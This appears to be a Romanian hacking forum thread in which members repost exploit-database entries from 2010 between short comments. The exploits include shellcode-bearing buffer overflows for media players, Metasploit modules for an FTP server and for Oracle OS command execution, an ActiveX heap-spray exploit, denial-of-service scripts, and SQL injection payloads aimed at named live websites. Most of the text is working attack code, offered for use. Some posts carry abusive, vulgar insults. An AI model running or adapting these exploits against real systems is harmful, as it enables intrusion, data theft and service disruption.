ANdreicj

Suna bine ..

La multi ani !

Copy & paste .. P.S : Esti retardat ma ? macar de verificai link-urile inainte sa le postezi .

Hmmm, oare toti de pe hackforums sunt asa ca el ? )

# Exploit Title: ArGoSoft FTP Server .NET v.1.0.2.1 directory traversal # Date: 16.03.2010 # Author: dmnt # Software Link: http://www.argosoft.com/files/apps/FtpServerSetup.msi # Version: ArGoSoft FTP Server .NET v.1.0.2.1 # Tested on: Windows 7 # Code : CWD ... 250 Requested file action OK, completed XPWD 257 "/.../" is working directory CWD ... 250 Requested file action OK, completed XPWD 257 "/.../.../" is working directory

#!/usr/bin/perl # Title: myMP3-Player v3.0 (.m3u) Local Buffer Overflow Exploit (SEH) # Date: 18.03.2010 # Author: n3w7u # Software Link: http://www.chip.de/downloads/myMP3-Player-3.0_13008621.html # Version: 3.0 and the other version can't be download from serious Page, and don't be free. # Tested on: Windows XP SP3 (ger) #[ Buffer ][ Short Jump ][ P/P/R ][ NOP ][ Shellcode ][ NOP ] my $file= "evil.m3u"; my $junk ="\x41" x 1040; # for myMp3 Player 5/cracked junk =1056 my $jmp="\xEB\x08\x90\x90"; # jmp short my $seh="\x25\x12\xC8\x72"; #72 C8 12 25 msacm32.drv my $nop ="\x90" x 20; my $nops ="\x90" x 10; # windows/exec - 224 bytes # http://www.metasploit.com # Encoder: x86/call4_dword_xor # EXITFUNC=process, CMD=calc.exe my $buf = "\x2b\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" . "\x0e\xa8\x6e\x77\xce\x83\xee\xfc\xe2\xf4\x54\x86\xfe\xce" . "\xa8\x6e\x17\x47\x4d\x5f\xa5\xaa\x23\x3c\x47\x45\xfa\x62" . "\xfc\x9c\xbc\xe5\x05\xe6\xa7\xd9\x3d\xe8\x99\x91\x46\x0e" . "\x04\x52\x16\xb2\xaa\x42\x57\x0f\x67\x63\x76\x09\x4a\x9e" . "\x25\x99\x23\x3c\x67\x45\xea\x52\x76\x1e\x23\x2e\x0f\x4b" . "\x68\x1a\x3d\xcf\x78\x3e\xfc\x86\xb0\xe5\x2f\xee\xa9\xbd" . "\x94\xf2\xe1\xe5\x43\x45\xa9\xb8\x46\x31\x99\xae\xdb\x0f" . "\x67\x63\x76\x09\x90\x8e\x02\x3a\xab\x13\x8f\xf5\xd5\x4a" . "\x02\x2c\xf0\xe5\x2f\xea\xa9\xbd\x11\x45\xa4\x25\xfc\x96" . "\xb4\x6f\xa4\x45\xac\xe5\x76\x1e\x21\x2a\x53\xea\xf3\x35" . "\x16\x97\xf2\x3f\x88\x2e\xf0\x31\x2d\x45\xba\x85\xf1\x93" . "\xc2\x6f\xfa\x4b\x11\x6e\x77\xce\xf8\x06\x46\x45\xc7\xe9" . "\x88\x1b\x13\x9e\xc2\x6c\xfe\x06\xd1\x5b\x15\xf3\x88\x1b" . "\x94\x68\x0b\xc4\x28\x95\x97\xbb\xad\xd5\x30\xdd\xda\x01" . "\x1d\xce\xfb\x91\xa2\xad\xc9\x02\x14\xe0\xcd\x16\x12\xce"; open($File,">$file"); print $File $junk.$jmp.$seh.$nop.$buf.$nops; close($File);

# Exploit Title: mplayer <= 4.4.1 NULL pointer dereference exploit poc 0 day # Date: 17/03/2010 # Author: Pietro Oliva # Software Link: # Version: <= 4.4.1 # Tested on: ubuntu 9.10 but should work in windows too # CVE : #Program received signal SIGSEGV, Segmentation fault. #0x081176d8 in af_calc_filter_multiplier () #(gdb) disas af_calc_filter_multiplier #Dump of assembler code for function af_calc_filter_multiplier: #0x081176d0 <af_calc_filter_multiplier+0>: push %ebp #0x081176d1 <af_calc_filter_multiplier+1>: mov %esp,%ebp #0x081176d3 <af_calc_filter_multiplier+3>: fld1 #0x081176d5 <af_calc_filter_multiplier+5>: mov 0x8(%ebp),%eax #0x081176d8 <af_calc_filter_multiplier+8>: mov (%eax),%eax ==> mplayer tries to dereference eax, which is a NULL pointer!!! #0x081176da <af_calc_filter_multiplier+10>: lea 0x0(%esi),%esi #0x081176e0 <af_calc_filter_multiplier+16>: fmull 0x28(%eax) #0x081176e3 <af_calc_filter_multiplier+19>: mov 0x18(%eax),%eax #0x081176e6 <af_calc_filter_multiplier+22>: test %eax,%eax #0x081176e8 <af_calc_filter_multiplier+24>: jne 0x81176e0 <af_calc_filter_multiplier+16> #0x081176ea <af_calc_filter_multiplier+26>: pop %ebp #0x081176eb <af_calc_filter_multiplier+27>: ret #End of assembler dump. # REGISTERS: #eax 0x0 0 ==========> NULL #ecx 0xfa157a57 -99255721 #edx 0x1fe0 8160 #ebx 0x8509a08 139500040 #esp 0xbfffe2e8 0xbfffe2e8 #ebp 0xbfffe2e8 0xbfffe2e8 #esi 0x7b84000 129515520 #edi 0xf8000 1015808 #eip 0x81176d8 0x81176d8 <af_calc_filter_multiplier+8> #eflags 0x10216 [ PF AF IF RF ] #cs 0x73 115 #ss 0x7b 123 #ds 0x7b 123 #es 0x7b 123 #fs 0x0 0 #gs 0x33 51 #!/usr/bin/perl print "[+] mplayer <= 4.4.1 NULL pointer dereference exploit poc 0 day by Pietro Oliva\n"; print "[+] pietroliva[at]gmail[dot]com http://olivapietro.altervista.org\n"; print "[+] creating crafted file mplayer.wav\n"; $buffer="\x52\x49\x46\x46\x1f\x04\x00\x00\x57\x41\x56\x45\x66\x6d\x74\x20\x10\x00\x00\x00\x01\x00\x1f"; open(file,"> mplayer.wav"); print(file $buffer); print "[+] done!\n";

E ceva obisnuit .. topicu asta n-are nici un rost .

Dear Sir / Madam The ItSecTeam has discovered a new bug in PHP Classifieds Lastest Version and will be glad to report and public it . More information about this bug is listed below : ======================================================================================= Topic : PHP Classifieds Version 7.5 Bug type : Blind SQL Injection Author : ItSecTeam Remote : Yes Status : Bug ===================== Content ====================== ( # Advisory Content : PHP Classifieds ( # Mail : Bug@ItSecTeam.com ( # Find By : Amin Shokohi(Pejvak!) ( # Special Tnx : M3hr@n.S , 0xd41684c654 And All Team Members! ( # Website : WwW.ItSecTeam.com ( # Forum : WwW.Forum.ItSecTeam.com ================================================= ============================================= Exploit 1 ======================================= ( * http://localhost/phpClassifieds v7.5/ad_click.php?bid=2 SQL Injection Code ---------------------------------------------------------------------------------- <BUG> $bid=getParam("bid",""); if ($bid>0) { $sql_banner = "SELECT goto_url FROM $banner_tbl WHERE bid=****$bid****"; ........} </Bug> ---------------------------------------------------------------------------------- ===========================================================================================

# Exploit Title: Open & Compact FTPd 1.2 Pre-Authentication Buffer Overflow MSF # Date: March 14, 2010 # Author: Blake # Software Link: http://sourceforge.net/projects/open-ftpd/files/open-ftpd/binairies.1.2/open-ftpd.1.2.tar.gz/download # Version: 1.2 # Tested on: XP SP3 Exploit causes the ftp server to crash so adduser, etc. payloads are most effective. require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp def initialize(info = {}) super(update_info(info, 'Name' => 'Open & Compact FTPd 1.2 Pre-Authentication Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in the USER verb in Open & Compact FTPd version 1.2. The program will crash once the payload is sent, so bind shell payloads are not effective. }, 'Author' => 'Blake', 'License' => MSF_LICENSE, 'Version' => 'Version 1', 'References' => [ [ 'EDB-ID', '11420'], [ 'URL', 'http://www.exploit-db.com/exploits/11420' ], ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 400, 'BadChars' => "\x00\x20\x0a\x0d", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP2/SP3 English', { 'Ret' => 0x00202c42 } ], ], 'DisclosureDate' => 'Feb 12, 2010', 'DefaultTarget' => 0)) end def exploit connect sploit = "\x42\x2c\x20" * 199 sploit << make_nops(10) sploit << payload.encoded print_status("Trying target #{target.name<http://target.name>}...") login = "USER #{sploit}\r\n" login << "PASS " + rand_text_alphanumeric(12) sock.put(login + "\r\n") handler disconnect end end

<html> <!-- |------------------------------------------------------------------| | __ __ | | _________ ________ / /___ _____ / /____ ____ _____ ___ | | / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ | | / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / | | \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ | | | | http://www.corelan.be:8800 | | security@corelan.be | | | |-------------------------------------------------[ EIP Hunters ]--| # Liquid XML Studio 2010 <= v8.061970 - (LtXmlComHelp8.dll) OpenFile() Remote 0day Heap Overflow Exploit # Found by: Steven Seeley (mr_me) http://net-ninja.net/ # Homepage: http://www.liquid-technologies.com/ # Download: http://www.liquid-technologies.com/Download.aspx # Tested on: Windows XP SP3 (IE 6 & 7) # Greetz: Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # Reference: http://www.exploit-db.com/exploits/7402 # Thanks to e.wiZz! & shinnai for the reliable js code # ###################################################################################################### # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. ! marked safe for scripting ! ~~~~~~~ Liquid XML Customers ~~~~~~~ http://www.liquid-technologies.com/Customers.aspx Liquid XML Studio is being used by thousands of organisations around the globe including many FTSE 100 and Fortune 100 companies, as part of their business critical projects. - Australian DoD - US DoD - Federal Department of Foreign Affairs - NSA - US Army Material Command - Bank of America - American Express - HSBC Bank - Merrill Lynch - Microsoft Corporation - Cisco Systems - etc enough said. --> <object classid='clsid:E68E401C-7DB0-4F3A-88E1-159882468A79' id='boom' ></object> <script language="JavaScript" defer> //calc.exe var sCode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" + "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" + "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" + "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" + "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" + "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" + "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" + "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" + "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" + "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" + "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" + "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" + "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" + "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" + "%u652E%u6578%u9000"); var sSlide = unescape("%u9090%u9090"); var heapSA = 0x0c0c0c0c; function tryMe() { var buffSize = 10000; var x = unescape("%0a%0a%0a%0a"); while (x.length<buffSize) x += x; x = x.substring(0,buffSize); boom.OpenFile(x, 1); } function getsSlide(sSlide, sSlideSize) { while (sSlide.length*2<sSlideSize) { sSlide += sSlide; } sSlide = sSlide.substring(0,sSlideSize/2); return (sSlide); } var heapBS = 0x400000; var sizeHDM = 0x5; var PLSize = (sCode.length * 2); var sSlideSize = heapBS - (PLSize + sizeHDM); var heapBlocks = (heapSA+heapBS)/heapBS; var memory = new Array(); sSlide = getsSlide(sSlide,sSlideSize); for (i=0;i<heapBlocks;i++) { memory[i] = sSlide + sCode; } </script> <body onload="JavaScript: return tryMe();"> <p><center>~ mr_me presents ~</p> <p><b>Liquid XML Studio 2010 <= v8.061970 - (LtXmlComHelp8.dll) OpenFile() Remote 0day Heap Overflow Exploit</b></center></p> </body> </html>

#!/usr/bin/perl ################################################################################ # # +------------------------------------------------------------------------+ # | ....... | # | ..''xxxxxxxxxxxxxxx'... | # | ..'xxxxxxxxxxxxxxxxxxxxxxxxxxx.. | # | ..'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'. | # | .'xxxxxxxxxxxxxxxxxxxxxxxxxxxx'''.......'. | # | .'xxxxxxxxxxxxxxxxxxxxx''...... ... .. | # | .xxxxxxxxxxxxxxxxxx'... ........ .'. | # | 'xxxxxxxxxxxxxxx'...... '. | # | 'xxxxxxxxxxxxxx'..'x.. .x. | # | .xxxxxxxxxxxx'...'.. ... .' | # | 'xxxxxxxxx'.. . .. .x. | # | xxxxxxx'. .. x. | # | xxxx'. .... x x. | # | 'x'. ...'xxxxxxx'. x .x. | # | .x'. .'xxxxxxxxxxxxxx. '' .' | # | .xx. .'xxxxxxxxxxxxxxxx. .'xx'''. .' | # | .xx.. 'xxxxxxxxxxxxxxxx' .'xxxxxxxxx''. | # | .'xx'. .'xxxxxxxxxxxxxxx. ..'xxxxxxxxxxxx' | # | .xxx'. .xxxxxxxxxxxx'. .'xxxxxxxxxxxxxx'. | # | .xxxx'.'xxxxxxxxx'. xxx'xxxxxxxxxx'. | # | .'xxxxxxx'.... ...xxxxxxx'. | # | ..'xxxxx'.. ..xxxxx'.. | # | ....'xx'.....''''... | # | | # | CubilFelino Security Research Labs | # | proudly presents... | # +------------------------------------------------------------------------+ # # Embedthis Appweb 3.1.2 Remote DoS # # # Greets: l1l1th (my h4x0r bab3), nitr0us, alt3kx, hkm, r1l0, b0rr3x, w01f, # w0lf47, gh0st, CHiP, corelanc0d3r and all the crew of sectester.net. # ################################################################################ # Exploit Title: Embedthis Appweb 3.1.2 Remote DoS # Date: Mar 12, 2010 # Author: chr1x # Software Link: http://embedthis.com/downloads/index.html # Version: 3.1.2 # Tested on: Windows XP SP3 (Spanish Edition) # st4rt of v00d00 c0d3 XD use HTTP::Lite; use IO::Socket; use locale; if ($#ARGV != 1) { print " ############################################################ CubilFelino Security Labs Embedthis Appweb 3.1.2 Remote DoS by chr1x\@sectester.net ############################################################ Usage: ". $0 ." -h (ip address)\n "; exit; } &main(); sub main { print " ############################################################ CubilFelino Security Labs Embedthis Appweb 3.1.2 Remote DoS by chr1x\@sectester.net ############################################################ "; # Variables $DossedIP = $ARGV[1]; # Execution functions &appWebCheck(); sleep 30; &afterDoS(); } sub appWebCheck { print "[*] Verifying that AppWeb is running at $DossedIP in port 80\n"; my $http = new HTTP::Lite; my $req = $http->request("http://$DossedIP/") or die "[*] Remote address $DossedIP seems not to be up, stopped"; if ($req) { print "[*] w00t! Appweb seems to be running! Sending DoS.. XD\n"; for ($i=1; $i<=2000; $i++) { my $sock = new IO::Socket::INET (PeerAddr => $DossedIP, PeerPort => '80', Proto => 'tcp', Type => SOCK_STREAM,); if ($sock) { print "[*] Sending Connection request Number: $i\n"; print $sock "Die Biatch!"; close($sock); }}}} sub afterDoS { $http = new HTTP::Lite; $req = $http->request("http://$DossedIP/") or die "[*] Webserver DoSsed!! Port 80 is unreacheable now."; }

# SWINGETTE 1.1 (.mp3) Buffer Overflow DOS Exploit # 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 # 0 _ __ __ __ 1 # 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 # 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 # 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 # 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 # 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 # 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 # 1 \ \____/ >> Exploit database separated by exploit 0 # 0 \/___/ type (local, remote, DoS, etc.) 1 # 1 1 # 0 [+] Site : Inj3ct0r.com 0 # 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 # 0 0 # 1 ###################################### 1 # 0 I'm cr4wl3r member from Inj3ct0r Team 1 # 1 ###################################### 0 # 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 #[+] Discovered By: cr4wl3r print mp3 "\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00". print mp3 "\x4D\x54\x68\x64"; print mp3 "\x4D\x54\x68\x64"; print mp3 "\x4D\x54\x68\x64"; print mp3 "\x4D\x54\x68\x64"; open(mp3, ">sploit.mp3"); # Note: dapet email account doank??? bruakakaka. eh njing loe tanya aja ama FO nya langsung. gw dapet apa??? # nukannya loe yang ngirim email ama FOnya buat ngelink web loe??? sampe skrng engga direp ama FO nya. krna dia tau loe itu dodol. # loe bilang apa??? keluarga gw??? wkwkwkwkwk. loe aja belum lepas netek dari mak loe mau ngajak berantem??? # eh njink gw tau loe dimana skrng. # gw ama temen forum gw??? tuh liahat aja siapa special Greets noh??? yang paling ujung tuh siapa??? dai anak forum gw njing, dan smpe itu loe minta2 ampun ama dia krna blog loe engga hidup2 lagi ampe skrng. # masih mau belagu loe njing??? badan hanya tinggal bonus gitu engga usah belagu. # Lame in Action: http://photos-b.ak.fbcdn.net/hphotos-ak-snc3/hs028.snc3/11559_1259969493634_1061556093_848543_5837025_n.jpg (emut nih kontol gw njink)

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::ORACLE def initialize(info = {}) super(update_info(info, 'Name' => ' DBMS_JVM_EXP_PERMS 11g R1/R2 OS Code Execution', 'Description' => %q{ This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package that allows any user with create session privilege to grant themselves java IO privileges. Identified by David Litchfield. Works on 11g R1 and R2 (Windows only). }, 'Author' => [ 'sid[at]notsosecure.com' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 8822 $', 'References' => [ [ 'URL', 'http://blackhat.com/html/bh-dc-10/bh-dc-10-archives.html#Litchfield' ], [ 'URL', 'http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/' ], ], 'DisclosureDate' => 'Feb 1 2010')) register_options( [ OptString.new('CMD', [ false, 'CMD to execute.', "echo metasploit >> %SYSTEMDRIVE%\\\\unbreakable.txt"]), ], self.class) end def run name = Rex::Text.rand_text_alpha(rand(10) + 1) package = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.io.FilePermission','<<ALL FILES>>','execute','ENABLED' from dual;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;" os_code = "select dbms_java.runjava('oracle/aurora/util/Wrapper c:\\\\windows\\\\system32\\\\cmd.exe /c #{datastore['CMD']}')from dual" begin print_status("Attempting to grant JAVA IO Privileges") prepare_exec(package) print_status("Attempting to execute OS Code") prepare_exec(os_code) rescue => e print_status("Error: #{e.class} #{e}") end end end --------------------------------------- ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::ORACLE def initialize(info = {}) super(update_info(info, 'Name' => ' DBMS_JVM_EXP_PERMS 10gR2, 11gR1/R2 OS Command Execution', 'Description' => %q{ This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package that allows any user with create session privilege to grant themselves java IO privileges. Identified by David Litchfield. Works on 10g R2, 11g R1 and R2 (Windows only) }, 'Author' => [ 'sid[at]notsosecure.com' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 8822 $', 'References' => [ [ 'URL', 'http://blackhat.com/html/bh-dc-10/bh-dc-10-archives.html#Litchfield' ], [ 'URL', 'http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/' ], ], 'DisclosureDate' => 'Feb 1 2010')) register_options( [ OptString.new('CMD', [ false, 'CMD to execute.', "echo metasploit >> %SYSTEMDRIVE%\\\\unbreakable.txt"]), ], self.class) end def run name = Rex::Text.rand_text_alpha(rand(10) + 1) package1 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.io.FilePermission','<<ALL FILES>>','execute','ENABLED' from dual;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;" package2 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','writeFileDescriptor',NULL,'ENABLED' FROM DUAL;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;" package3 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','readFileDescriptor',NULL,'ENABLED' FROM DUAL;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;" os_code = "select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe', '/c', ' #{datastore['CMD']}')from dual" begin print_status("Attempting to grant JAVA IO Privileges") prepare_exec(package1) prepare_exec(package2) prepare_exec(package3) print_status("Attempting to execute OS Code") prepare_exec(os_code) rescue => e print_status("Error: #{e.class} #{e}") end end end

<!-- SlimBrowser v4.12 (Loop) Remote Denial of Service Exploit jumping?? lolz lo sama anak2 forum lo yg kena deface itu kali yg doyan jumping klo blom pada bisa ngelocal sama ngepatch sini biar gw ajarin bangga bgt diajak gabung sama orang laen padahal cuma dapet email account doank, bruakakakaka, hack me if you can biatch!! eh tolol lo mo ngajak ribut gw?? jangan tanggung2 bawa 1 keluarga lo aja sekalian, biar gw ladenin lo semua Tested on Windows XP SP2. Author : v3n0m Site : http://yogyacarderlink.web.id/ Group : YOGYACARDERLINK Date : March, 15-2010 [INDONESIA] Contact : v3n0m666[at]live[dot]com Software: SlimBrowser Download: http://slimbrowser.flashpeak.com/en/dlpage.php Greets : LeQhi,lingah,m4rco,GheMaX,z0mb13,eidelweiss,JaLi-,mywisdom ShoutZ : Yogyakarta City & Jovita --> <html> <title>SlimBrowser v4.12 (Loop) Remote Denial of Service Exploit</Title> <body> <script language="JavaScript1.2" type="text/javascript"> function MainPageBookmark() {title="0wnage by v3n0m"; url="http://www.yogyacarderlink.web.id/"; if (window.sidebar) { window.sidebar.addPanel(title, url,"");} else if( window.external ) { window.external.AddFavorite( url, title); } else if(window.opera && window.print) { return true; }} for (k=0;k<k+1;k++) MainPageBookmark(); </script> </body>

Asa mai merge ..

"Cactus" wtf ?!

================================================ PHP-fusion-6-01-18 (members.php) disclosure ways ================================================ 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #[+] Discovered By : Inj3ct0r #[+] Site : Inj3ct0r.com #[+] support e-mail : submit[at]inj3ct0r.com Product: PHP-Fusion Version: php-fusion-6-01-18 Disclosure ways: http://[PATH]/members.php?sortby[]=A http://[PATH]/messages.php?folder[]=inbox

=================================================================== PHP-Fusion <= 6.01.15.4 (downloads.php) SQL Injection Vulnerability =================================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #[+] Discovered By : Inj3ct0r #[+] Site : Inj3ct0r.com #[+] support e-mail : submit[at]inj3ct0r.com Product: PHP-Fusion Version: 6.01.15.4 Dork : http://www.rus-phpfusion.com/news.php?readmore=32 Error in file downloads.php PHP code: $result = dbquery("SELECT * FROM ".$db_prefix."downloads WHERE download_id='$page_id'"); A vulnerable parameter $ page_id Exploit: downloads.php?page_id=-1%27+union+select+1,2,user_name,4,user_password,6,7,8,9,10,11,12,13,14,15,16,17+from+rusfusion_users+limit+0,1/* Example: http://efir-service.com/downloads.php?page_id=-1%27+union+select+1,2,user_name,4,user_password,6,7,8,9,10,11,12,13,14,15,16,17+from+rusfusion_users+limit+0,1/* password is encrypted by: md5 (md5 ($ pass))

===================================================== PHP-Fusion-AP-7.00.2-Rus (search.php) disclosure ways ===================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #[+] Discovered By : Inj3ct0r #[+] Site : Inj3ct0r.com #[+] support e-mail : submit[at]inj3ct0r.com Site: www.alipapa.com.ua Product: PHP-Fusion Version: PHP-Fusion-AP-7.00.2-Rus Disclosure ways. Error in file search.php PHP code: if (isset($_GET['stext'])) { if (is_array($_GET['stext'])) { redirect(FUSION_SELF); } else { $_GET['stext'] = urlencode(stripinput($_GET['stext'])); } } else { $_GET['stext'] = ""; } Example: http://alipapa.com.ua/search.php?stext []

Great work !.

Caption = "Respect ][ Death Team ][ 2009 ][ " - hacerilor ), pardon, haxorilor .. prindeti tot ce e sursa si hexati .

Sa traiesti !

Trebe sa traiasca si ei din ceva .. de aceea sunt comerciali .. .

"scaner de rpd" wtf ? mai esti si 31337 h4x0r .. p.s : Shootyourself.